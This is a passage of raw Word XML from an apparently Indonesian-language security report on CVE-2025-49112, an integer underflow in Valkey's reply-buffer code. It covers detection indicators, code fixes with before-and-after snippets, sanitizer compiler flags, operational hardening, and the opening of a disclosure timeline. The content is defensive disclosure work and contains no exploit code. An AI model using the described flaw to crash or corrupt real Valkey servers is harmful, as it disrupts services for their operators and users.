            <w:pPr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Prioritas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Tinggi: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kemungkinan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eksploitasi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berhasil</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="4EEA54D5" w14:paraId="33ACCA97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:rsidP="4EEA54D5" w14:paraId="651929BB" wp14:textId="77777777">
            <w:pPr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Koneksi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TCP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ke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port 6379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dengan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payload yang sangat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pendek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namun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berulang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411A74D1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Kemungkinan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reconnaissance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atau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fuzzing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="4EEA54D5" w14:paraId="2C336013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:rsidP="4EEA54D5" w14:paraId="381A1C5B" wp14:textId="77777777">
            <w:pPr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Paket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dengan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nilai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used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melebihi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size pada header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Valkey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119DC7DA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Indikasi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langsung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trigger underflow</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="4EEA54D5" w14:paraId="6DB536D0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:rsidP="4EEA54D5" w14:paraId="0C8883B1" wp14:textId="77777777">
            <w:pPr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Penurunan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drastis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memori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tersedia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pada host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Valkey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11A11C40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Kemungkinan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heap exhaustion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atau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corruption</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="4EEA54D5" w14:paraId="7FD88B71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63665DA5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Core dump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dari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proses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-server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5FA4F34E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Eksploitasi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kemungkinan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berhasil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men-crash server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="4EEA54D5" w14:paraId="200F9F97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1DAB2C4C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Lonjakan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tiba-tiba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pada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jumlah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koneksi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dari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satu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sumber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IP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85" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="85" w:type="dxa"/>
              <w:right w:w="130" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4B995042" wp14:textId="77777777"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Kemungkinan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heap grooming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atau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brute force</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="680A4E5D" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="19219836" wp14:textId="77777777">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A3A5C" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="140" w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3F37A83E" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="440" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A1628"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">BAB VII: STRATEGI MITIGASI DAN REKOMENDASI TEKNIS</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4EEA54D5" w14:paraId="241EE3B6" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D0DCF0" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="160"/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7.1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Perbaikan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Kode: Solusi Utama</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3C89F506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Perbaikan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kerentanan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adalah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menambahkan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pengecekan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pre-condition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sebelum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melakukan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pengurangan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unsigned integer.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Dengan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memvalidasi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bahwa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dikurangi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tidak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melebihi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dikurangi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kondisi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underflow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dihindari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sepenuhnya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:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="296FEF7D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7D606DD2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1A3A5C" w:sz="4"/>
              <w:right w:val="single" w:color="1A3A5C" w:sz="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E11C65" wp14:textId="2260E1D9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PERBAIKAN 1: Guard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pre-condition check (RECOMMENDED) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06ED1C03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2DCAB6AC" wp14:textId="77051AAA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Sebelum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(RENTAN): </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36DEB200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if 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-&gt;size -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-&gt;used &gt; 0) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C9BDA83" wp14:textId="5A0B43F9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...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kode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dieksekusi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ukuran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mungkin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salah ... </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6677DC93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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="707D7BCF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119BAD6B" wp14:textId="71EF9122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Sesudah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(AMAN): </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D170A63" wp14:textId="052984EE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if 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-&gt;used &lt;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-&gt;size)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{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Perbandingan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langsung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,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bukan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pengurangan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</w:p>
          <w:p w14:paraId="44D046BF" wp14:textId="77B24DC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size_t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remaining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=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-&gt;size -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-&gt;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used;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Sekarang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aman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karena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used &lt; size </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19D3C329" wp14:textId="0B7C26AB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...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gunakan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remaining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aman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... </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1301A7DE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}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="4EEA54D5" w14:paraId="3ED88BAD" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa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val="clear" w:color="auto" w:fill="F0F4FA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679D92A9" wp14:textId="77777777"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Listing 7.1 -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Perbaikan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utama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: pre-condition check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sebelum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operasi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pengurangan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unsigned</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7194DBDC" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4EEA54D5" w14:paraId="6D133E88" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D0DCF0" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="160"/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7.2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Perbaikan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dengan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C23 Checked Arithmetic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6B9E89C4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1A3A5C" w:sz="4"/>
              <w:right w:val="single" w:color="1A3A5C" w:sz="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4BD3E7" wp14:textId="0D5DDCEB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PERBAIKAN 2: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Menggunakan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C23 checked arithmetic macros </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35BC0BCD" wp14:textId="5B8EDB33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Memerlukan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: #include &lt;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stdckdint.h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&gt; (C23 standard) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A47D515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16E79C02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#include &lt;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stdckdint.h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&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15E48944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46E3E24C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size_t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remaining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;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A4E68ED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5D6599E2" wp14:textId="2D3C5BBE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ckd_sub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()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mengembalikan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true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jika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overflow/underflow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terjadi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</w:p>
          <w:p w14:paraId="65023F50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if (!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ckd_sub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(&amp;remaining,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-&gt;size,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-&gt;used)) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2098729E" wp14:textId="26B1819A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Hanya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dieksekusi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jika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pengurangan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tidak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mengalami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underflow </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="134E5B56" wp14:textId="4270A2AC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remaining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berisi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nilai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yang valid </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71D96B04" wp14:textId="5454FB15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...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gunakan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remaining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aman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... </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="750E2B00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} else {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32D97FB2" wp14:textId="5525E98A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Handle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kondisi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error: used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melebihi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size </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31A5A177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serverLog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(LL_WARNING, "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setDeferredReply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: invalid buffer state");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4710BD4C" wp14:textId="2E6F7B5D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Lanjutkan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safe fallback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atau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return error </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E418489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}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="4EEA54D5" w14:paraId="6B1DD6BB" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa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val="clear" w:color="auto" w:fill="F0F4FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="240" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="240" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidP="4EEA54D5" w14:paraId="68EC26ED" wp14:textId="77777777">
            <w:pPr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Listing 7.2 -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Perbaikan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menggunakan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C23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ckd_sub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()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deteksi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underflow yang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eksplisit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="769D0D3C" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4EEA54D5" w14:paraId="0F2C6057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7.3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Perbaikan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Defensif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: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Menggunakan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size_t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50F1D4E9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1A3A5C" w:sz="4"/>
              <w:right w:val="single" w:color="1A3A5C" w:sz="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CE066B" wp14:textId="24B91C28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PERBAIKAN 3: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Menggunakan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tipe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lebih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sesuai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</w:p>
          <w:p w14:paraId="30E85FE0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10CBC094" wp14:textId="2D50626F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Gunakan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size_t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(platform-native unsigned)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daripada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uint32_t </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E81F40D" wp14:textId="0EB16AAD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dan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tambahkan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assertion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verifikasi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di debug build </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2080AEB9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4943B1C9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#include &lt;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assert.h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&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29AC5F55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43C21564" wp14:textId="38AC3BD2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Di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definisi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struct,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pertimbangkan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menggunakan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size_t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</w:p>
          <w:p w14:paraId="7904A4A6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typedef struct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clientReplyBlock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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29163316" wp14:textId="5E8015B8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size_t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size;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Ganti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dari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uint32_t </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="532DB165" wp14:textId="4705403E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size_t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used;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Ganti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dari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uint32_t </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72C62739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char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buf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[];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4563D4CA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}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clientReplyBlock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;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A2859AB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6B138F5F" wp14:textId="29123B7F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Dalam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fungsi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setDeferredReply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() </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46F9D5F3" wp14:textId="6511BBFE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assert(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-&gt;used &lt;=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-&gt;size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);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Crash di debug build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jika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invariant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dilanggar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</w:p>
          <w:p w14:paraId="596EC369" wp14:textId="31635085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if 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-&gt;used &lt;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-&gt;size)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{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Guard yang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aman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</w:p>
          <w:p w14:paraId="7D3EB8BE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size_t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remaining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=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-&gt;size -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prev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-&gt;used;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="628ED255" wp14:textId="09270446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    ... </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A8AD0BE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}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="4EEA54D5" w14:paraId="298A0F9E" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa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val="clear" w:color="auto" w:fill="F0F4FA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4F4E22E6" wp14:textId="77777777"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Listing 7.3 -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Perbaikan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defensif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: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penggunaan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tipe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tepat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dan assertion</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="54CD245A" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4EEA54D5" w14:paraId="0B14F8B0" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D0DCF0" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="160"/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7.4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Rekomendasi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Kompilasi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: Sanitizer Flags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4DD10F23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1A3A5C" w:sz="4"/>
              <w:right w:val="single" w:color="1A3A5C" w:sz="4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2BA0ED" wp14:textId="13D1441B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Kompilasi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dengan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UBSan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deteksi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unsigned integer overflow</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47707B76" wp14:textId="62DFDD53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Berguna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selama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development dan testing</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1ECA394A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582C3BC6" wp14:textId="526E5AE3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>GCC:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72D7BD13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gcc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fsanitize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=undefined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fsanitize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=signed-integer-overflow \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7171A9BD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fsanitize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=unsigned-integer-overflow \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A8B0D14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fno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-sanitize-recover=all \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6136F02E" wp14:textId="64C381FB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-o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-server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src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.c</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F21F270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67AE2283" wp14:textId="30A914FA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Clang (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lebih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verbose):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0824A1E1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clang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fsanitize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=undefined \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03D525F0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fsanitize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=unsigned-integer-overflow \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6454648C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fsanitize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-trap=all \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2247568D" wp14:textId="36EE7AD2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-o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-server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src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.c</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7146A6A2" wp14:textId="77777777">
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12F25856" wp14:textId="0438C0EB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production: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AddressSanitizer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deteksi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OOB access</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75077575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gcc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fsanitize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=address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fsanitize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=leak \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4314A103" wp14:textId="7777777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fno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-omit-frame-pointer \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28EE9F9D" wp14:textId="7E0007B7">
            <w:pPr>
              <w:spacing w:after="0" w:line="280" w:lineRule="auto"/>
            </w:pP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   -o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valkey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-server-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asan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src</w:t>
            </w:r>
            <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="4EEA54D5" w14:paraId="7CF299DD" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D8DDE6" w:sz="1"/>
              <w:left w:val="single" w:color="D8DDE6" w:sz="1"/>
              <w:bottom w:val="single" w:color="D8DDE6" w:sz="1"/>
              <w:right w:val="single" w:color="D8DDE6" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F4FA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5A81E209" wp14:textId="77777777"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Listing 7.4 - Compiler flags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>deteksi</w:t>
            </w:r>
            <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
                <w:color w:val="5A6070"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> integer underflow dan memory corruption</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="1231BE67" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4EEA54D5" w14:paraId="71B0D8FE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7.5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Rekomendasi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Operasional</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="36FEB5B0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2450A08D" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A3C" w:sz="10"/>
              <w:left w:val="single" w:color="1A7A3C" w:sz="10"/>
              <w:bottom w:val="single" w:color="D8DDE6" w:sz="1"/>
              <w:right w:val="single" w:color="D8DDE6" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F8ED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0FF61F3" wp14:textId="77777777">
            <w:pPr>
              <w:spacing w:after="100"/>
            </w:pP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7A3C"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">+  Langkah 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7A3C"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Mitigasi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7A3C"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> 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7A3C"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Segera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7A3C"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> (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7A3C"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Prioritas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7A3C"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Tinggi)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidP="4EEA54D5" w14:paraId="342BD38D" wp14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="110" w:line="340" w:lineRule="auto"/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Update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versi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sudah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mengandung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patch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CVE-2025-49112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sesegera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mungkin</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2529EFA7" wp14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="110" w:line="340" w:lineRule="auto"/>
              <w:rPr/>
            </w:pP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Batasi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akses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port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(6379)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hanya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dari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IP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dipercaya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menggunakan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firewall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rules</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidP="4EEA54D5" w14:paraId="31CCF89D" wp14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="110" w:line="340" w:lineRule="auto"/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Nonaktifkan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akses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dari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jaringan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publik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jika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tidak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diperlukan</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidP="4EEA54D5" w14:paraId="184A6BE2" wp14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="110" w:line="340" w:lineRule="auto"/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</w:pP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Aktifkan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authentication (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requirepass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)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lapisan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perlindungan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tambahan</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D991B5F" wp14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="110" w:line="340" w:lineRule="auto"/>
              <w:rPr/>
            </w:pP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Monitor log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sistem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dan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indikator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kompromi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disebutkan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pada Bab VI</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="30D7AA69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46F0236C" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="8B6914" w:sz="10"/>
              <w:left w:val="single" w:color="8B6914" w:sz="10"/>
              <w:bottom w:val="single" w:color="D8DDE6" w:sz="1"/>
              <w:right w:val="single" w:color="D8DDE6" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FDFAE3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5A895BC7" wp14:textId="77777777">
            <w:pPr>
              <w:spacing w:after="100"/>
            </w:pP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8B6914"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>i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8B6914"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">  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8B6914"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Rekomendasi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8B6914"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> 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8B6914"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Jangka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8B6914"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Panjang</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D978CDF" wp14:textId="77777777">
            <w:pPr>
              <w:spacing w:after="0" w:line="355" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pP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Terapkan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static analysis tools (Clang Static Analyzer, Coverity,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atau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CodeQL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) pada pipeline CI/CD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mendeteksi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pola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integer underflow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secara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otomatis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sebelum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merge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branch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utama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Integrasikan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fuzzing (AFL++,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libFuzzer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)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komponen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networking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guna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menemukan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kondisi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edge case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belum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teridentifikasi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Pertimbangkan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adopsi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Rust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komponen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baru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memerlukan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keamanan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memori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tinggi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.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7196D064" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="34FF1C98" wp14:textId="77777777">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A3A5C" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="140" w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0105659D" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="440" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A1628"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">BAB VIII: RESPONSIBLE DISCLOSURE TIMELINE</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4EEA54D5" w14:paraId="10B3F01B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8.1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Kronologi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Penemuan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dan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Pengungkapan</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6D072C0D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 xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="4EEA54D5" w14:paraId="079885E4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A1628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0A31F11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TANGGAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7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30" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6308EF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KEJADIAN DAN KETERANGAN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="4EEA54D5" w14:paraId="27C1D6FD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0DCF0"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="110" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="66123D1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A1628"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">2025-02-19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7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30" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="28F01AD4" wp14:textId="77777777">
            <w:pPr>
              <w:jc w:val="both"/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Penemuan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kerentanan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CVE-2025-49112 oleh @odaysec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melalui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analisis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kode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sumber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networking.c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pada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Identifikasi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awal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melalui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code review dan fuzzing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dasar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.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="4EEA54D5" w14:paraId="159C570B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8DDE6"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="110" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0877292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A1628"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">2025-02-19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7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30" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="552404E6" wp14:textId="77777777">
            <w:pPr>
              <w:jc w:val="both"/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Verifikasi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kerentanan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melalui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proof-of-concept dan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reproduksi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lokal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pada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lingkungan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terisolasi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Konfirmasi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bahwa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kondisi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underflow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dapat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dipicu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melalui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koneksi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jaringan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.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="4EEA54D5" w14:paraId="37611B44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0DCF0"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="110" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="33292D6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A1628"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">2025-02-20</w:t>
            </w:r>
